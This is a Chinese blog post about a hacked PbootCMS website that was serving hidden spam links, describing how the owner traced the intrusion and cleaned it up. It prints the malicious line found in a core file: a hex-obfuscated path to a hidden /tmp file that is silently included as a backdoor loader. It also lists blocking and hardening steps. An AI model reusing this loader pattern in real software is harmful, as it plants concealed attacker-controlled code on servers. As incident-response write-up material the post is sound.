当前位置:首页 >> CMS教程 >> pbootcms

pbootcms网站被黑记录及查找根源 /core/function/handle.php ​$runtime_dir = PACK('H*','2F746D702F2E

来源:本站 发布时间:2023-04-24 12:17:02 热度:226 ℃

今天在群里看到看到群友说站被黑了。

查看了一下自己的站,也发现了异常。

几天收入量增加了两万

1.jpg2.jpg

仔细看收入发现有很多。黑帽链接。

用站长工具查看。发现异常

3.jpg

3参考.jpg

代码的位置在模板的最上方。

所以排查的方向先从伪静态开始。

然后排查模板顶端。

然后再排查。Php入口文件。

4检查伪静态4.jpg

5模板.jpg

7工具查询1.jpg

都没有发现问题,那么就可能是在内核文件中

我先清理了备份文件,然后用工具查询了一下。

发现几个异常文件,然后逐一排查。

7工具查询.jpg


最后发现是这个文件的问题。

/core/function/handle.php

恶意代码

$runtime_dir = PACK('H*','2F746D702F2E4943452D756E69782F7169716930'); if(is_file($runtime_dir)){ @INCLUDE_ONCE($runtime_dir); }

用十六进制转换一下。

找到文件位置。删除,然后做好防护。

最终问题解决10最后结果.jpg

最后的总结。这种情况在前台几乎无法查看,只有查看看百度的收录异常才能发现。你直接打开网页右键源码时看不到任何问题的。

或者是用站长工具模拟搜索引擎抓取查看,可以看到异常。


1 屏蔽IP18.162.98.238

2 服务器 /tmp/.ICE-unix 文件禁止写入
3 robots.txt禁止抓取
Disallow: *.asp
Disallow: /?*
Disallow: /app*

如果你的问题还没有解决,点击qq群50604130 加入交流群一起学习交流。支持与鼓励站长,请扫码赞赏一下站长最后那几根倔强的头发。

  • 微信支付

    微信扫一扫

  • 支付宝支付

    支付宝扫一扫

交流学习

加入VIP即可下载全部模板;2天更新1套模板

年VIP:199元(金牌)

终身VIP:99元(钻石)限时特惠

  • QQ号

    Q:798088888

  • QQ号

    Q群:50604130

  • 添加微信客服

    微信客服

热门标签
 
QQ在线咨询
售前客服
仿站/建站